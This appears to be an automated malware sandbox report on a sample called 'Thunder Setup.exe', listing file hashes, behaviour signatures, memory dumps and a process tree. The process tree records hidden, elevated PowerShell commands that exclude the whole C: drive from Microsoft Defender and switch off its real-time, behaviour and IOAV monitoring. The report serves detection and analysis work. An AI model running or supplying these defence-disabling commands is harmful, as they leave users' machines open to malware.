Overview

overview

8

Static

static

3

Thunder Setup.exe

windows7-x64

8

Thunder Setup.exe

windows10-1703-x64

1

Thunder Setup.exe

windows10-2004-x64

8

Thunder Setup.exe

windows11-21h2-x64

8

Resubmissions

14-07-2024 22:14

240714-15wd4sxcrg 8

14-07-2024 16:06

240714-tj3gzaxdrn 8

Analysis

  • max time kernel
    359s
  • max time network
    372s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    14-07-2024 22:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Thunder Setup.exe

  • Size

    78KB

  • MD5

    1eb797341e423c83060a36b92c720cc9

  • SHA1

    380828212f0bb9a82d568491247a590a316e4351

  • SHA256

    0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177

  • SHA512

    9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b

  • SSDEEP

    1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2012
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1940
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1244

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    98c23a8076e4f61d1696e98bda90397a

    SHA1

    85e85c234f90f34d944b9a0a5e50d856611fcb10

    SHA256

    c3e8e888daacc91a2138eab06d023c79798dce08c48d65a50dc2ecdb1e130071

    SHA512

    397799b0b902b94e9cee6700c8d64e6593faab01b390061fde4d408ed82c6ff92370dfa70971349090492fbde859f1de4777b3b6949bdacde2330995a9d57738

    Download Submit

  • memory/1792-6-0x0000000002810000-0x0000000002838000-memory.dmp

    Filesize

    160KB

    Download

  • memory/1792-11-0x0000000002858000-0x0000000002860000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-13-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-29-0x0000000002850000-0x0000000002858000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-28-0x00000000028B0000-0x00000000028B8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-27-0x00000000028A8000-0x00000000028B0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-32-0x0000000002848000-0x0000000002850000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-34-0x00000000028B8000-0x00000000028C0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-36-0x00000000028C0000-0x00000000028C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-38-0x00000000028C8000-0x00000000028D0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-40-0x00000000028D0000-0x00000000028D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-41-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1792-43-0x00000000028D8000-0x00000000028E0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-46-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-45-0x0000000002810000-0x0000000002838000-memory.dmp

    Filesize

    160KB

    Download

  • memory/1792-47-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1792-52-0x00000000028E8000-0x00000000028F0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-51-0x0000000002858000-0x0000000002860000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-54-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-55-0x00000000028F0000-0x00000000028F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-60-0x00000000028F8000-0x0000000002900000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-59-0x00000000028B0000-0x00000000028B8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-58-0x00000000028A8000-0x00000000028B0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-64-0x0000000002900000-0x0000000002908000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-63-0x0000000002848000-0x0000000002850000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-69-0x0000000002908000-0x0000000002910000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-68-0x00000000028B8000-0x00000000028C0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-72-0x0000000002910000-0x0000000002918000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-71-0x00000000028C0000-0x00000000028C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-76-0x0000000002918000-0x0000000002920000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-75-0x00000000028C8000-0x00000000028D0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-80-0x0000000002920000-0x0000000002928000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-79-0x00000000028D0000-0x00000000028D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-88-0x0000000002928000-0x0000000002930000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-87-0x00000000028D8000-0x00000000028E0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-91-0x0000000002930000-0x0000000002938000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-90-0x00000000028E0000-0x00000000028E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-95-0x0000000002938000-0x0000000002940000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-94-0x00000000028E8000-0x00000000028F0000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-99-0x0000000002940000-0x0000000002948000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-98-0x00000000028F0000-0x00000000028F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-106-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1792-111-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-110-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-109-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-108-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-107-0x00000000028F8000-0x0000000002900000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-116-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1792-142-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1792-143-0x0000000002900000-0x0000000002908000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-166-0x0000000002908000-0x0000000002910000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-187-0x0000000002910000-0x0000000002918000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-188-0x0000000002918000-0x0000000002920000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-189-0x0000000002920000-0x0000000002928000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-190-0x0000000002928000-0x0000000002930000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-191-0x0000000002930000-0x0000000002938000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-192-0x0000000002938000-0x0000000002940000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-193-0x0000000002940000-0x0000000002948000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1792-194-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-195-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-196-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1792-197-0x0000000000E70000-0x0000000000E7A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2444-0-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

    Download